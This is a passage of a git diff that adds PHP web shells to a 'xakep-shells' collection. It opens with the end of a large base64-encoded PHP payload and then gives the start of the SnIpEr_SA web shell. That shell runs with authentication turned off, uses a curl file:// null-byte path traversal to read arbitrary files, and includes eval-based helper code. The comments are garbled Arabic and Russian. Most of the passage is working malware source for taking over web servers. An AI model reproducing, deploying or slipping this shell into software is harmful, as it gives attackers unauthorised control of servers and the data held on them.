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'))); 
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/sniper_sa_shell.txt b/xakep-shells/PHP/sniper_sa_shell.txt
new file mode 100644
index 0000000..a3b75ee
--- /dev/null
+++ b/xakep-shells/PHP/sniper_sa_shell.txt
@@ -0,0 +1,2246 @@
+<?php
+/******************************************************************************************************/
+/*                                      #  ##        ##   #
+/*                                    # # ## ###   ##   ## #  #
+/*                                  # ###  ### # ###   ##  ### #
+/*                                #      ##  ######### ##   #
+/*                                          ##########
+/*                                  ###      #########      ###
+/*                                #    ##     #######     ##    #
+/*                                       ##    #####    ##
+/*                                         ##  ####  ##
+/*                                             ####   ##
+/*                                            ######
+/*                                           ## ## ##
+/*                                        @@    ##    @@
+/*                                    @ @@@    ####    @@@ @
+/*                                    @@@     ######    @@@
+/*
+/*
+/*
+/*
+/*
+/*  SnIpEr_SA.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
+/*  ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://3asfh.net/
+/*  ??????:
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  ????????? ????????????? ?? ?????? ? ????:  ? ???? ?????? ??.
+/*  ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
+/*  ?? SnIpEr.SA@hotmail.com ??? ??????????? ????? ???????????.
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by SnIpEr_SA
+/*  MAIL http://rst.void.ru , http://ghc.ru
+/*  ANY MODIFIED REPUBLISHING IS RESTRICTED
+/******************************************************************************************************/
+/* ~~~ ÇáÎíÇÑÇÊ | Options  ~~~ */
+
+// ÇááÛÉ | Language
+// $language='ru' - ??????? (russian)
+// $language='eng' - english (??????????)
+$language='eng';
+
+// ?????????????? | Authentification
+// $auth = 1; - áÊÝÚíá ÇáÏÎæá Èßáãå ÇáãÑæÑ  ( authentification = On  )
+// $auth = 0; - áÇíÞÇÝ ÇáÏÎæá ÈßáãÉ ÇáãÑæÑ ( authentification = Off )
+$auth = 0;
+
+// áÏÎæá ÈßáãÉ ãÑæÑ æÇÓã ãÓÊÎÏã (Login & Password for access)
+// áÍãÇíÉ ÇáÓßÑÈÊ ãä ÏÎæá ÛíÑß ÛíÑ ÇáÊÇáí!!! (CHANGE THIS!!!)
+// åäÇ æÖÚß ßáãå ÇáãÑæÑ æåí ãÔÝÑå ÈÕíÛå md5, æßáãÉÚ ÇáãÑæÑ åäÇ åí  'r57'
+// ÊÓÊÚØíÚ Çä ÊÔÝÑ ßáãÉ ãÑæÑß æÇÓã ÇáãÓÊÎÏã ÈÕíÛÉ md5 ææÖÚåÇ Ýí ÇáÎÇäÇÊ ÇáÊÇáíå
+$name='ec371748dc2da624b35a4f8f685dd122'; // ÇÓã ÇáãÓÊÎÏã  (user login)
+$pass='ec371748dc2da624b35a4f8f685dd122'; // ßáãÉ ÇáãÑæÑ (user password)
+/******************************************************************************************************/
+if(empty($_POST['SnIpEr_SA'])){
+
+} else {
+$m=$_POST['SnIpEr_SA'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+
+}
+echo "".htmlspecialchars($m)."";
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = '1.31';
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ $_COOKIE = &$HTTP_COOKIE_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_COOKIE as $k=>$v)
+  {
+  $_COOKIE[$k] = stripslashes($v);
+  }
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="SnIpEr_SA"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=http://3asfh.net>SnIpEr_SA</a> : Access Denied</b>");
+   }
+}
+$head = '<!-- SnIpEr_SA -->
+<html>
+<head>
+<meta http-equiv="Content-Language" content="ar-sa">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
+<title>SnIpEr_SA shell</title>
+
+
+
+<STYLE>
+BODY {
+        SCROLLBAR-FACE-COLOR: #800000; SCROLLBAR-HIGHLIGHT-COLOR: #101010; SCROLLBAR-SHADOW-COLOR: #101010; SCROLLBAR-3DLIGHT-COLOR: #101010; SCROLLBAR-ARROW-COLOR: #101010; SCROLLBAR-TRACK-COLOR: #101010; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #101010
+}
+
+tr {
+BORDER-RIGHT:  #aaaaaa 2px solid;
+BORDER-TOP:    #eeeeee 2px solid;
+BORDER-LEFT:   #eeeeee 2px solid;
+BORDER-BOTTOM: #aaaaaa 2px solid;
+color: #ffffff;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 2px solid;
+BORDER-TOP:    #eeeeee 2px solid;
+BORDER-LEFT:   #eeeeee 2px solid;
+BORDER-BOTTOM: #aaaaaa 2px solid;
+color: #cccccc;
+}
+.table1 {
+BORDER: 1px;
+BACKGROUND-COLOR: #333333;
+color: #333333;
+}
+.td1 {
+BORDER: 1px;
+font: 7pt tahoma;
+color: #ffffff;
+}
+.tr1 {
+BORDER: 1px;
+color: #2279D9;
+}
+table {
+BORDER:  #eeeeee 2px outset;
+BACKGROUND-COLOR: #272727;
+color: #2279D9;
+}
+input {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #800000;
+font: 9pt tahoma;
+color: #ffffff;
+}
+select {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #000000;
+font: 9pt tahoma;
+color: #CCCCCC;;
+}
+submit {
+BORDER:  buttonhighlight 2px outset;
+BACKGROUND-COLOR: #272727;
+width: 40%;
+color: #2279D9;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 2px solid;
+BORDER-TOP:    #999999 2px solid;
+BORDER-LEFT:   #999999 2px solid;
+BORDER-BOTTOM: #ffffff 2px solid;
+BACKGROUND-COLOR: #3D3D3D;
+font: Fixedsys bold;
+color: #ffffff;
+}
+BODY {
+margin: 2px;
+color: #2279D9;
+background-color: #000000;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+  document.getElementById(id).style.display = \'none\';
+  document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+  document.getElementById(id).style.display = \'block\';
+  document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
+  if (document.getElementById(id).style.display == \'none\')
+    show_div(id);
+  else
+    hide_div(id);
+}
+</script>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        }
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    }
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
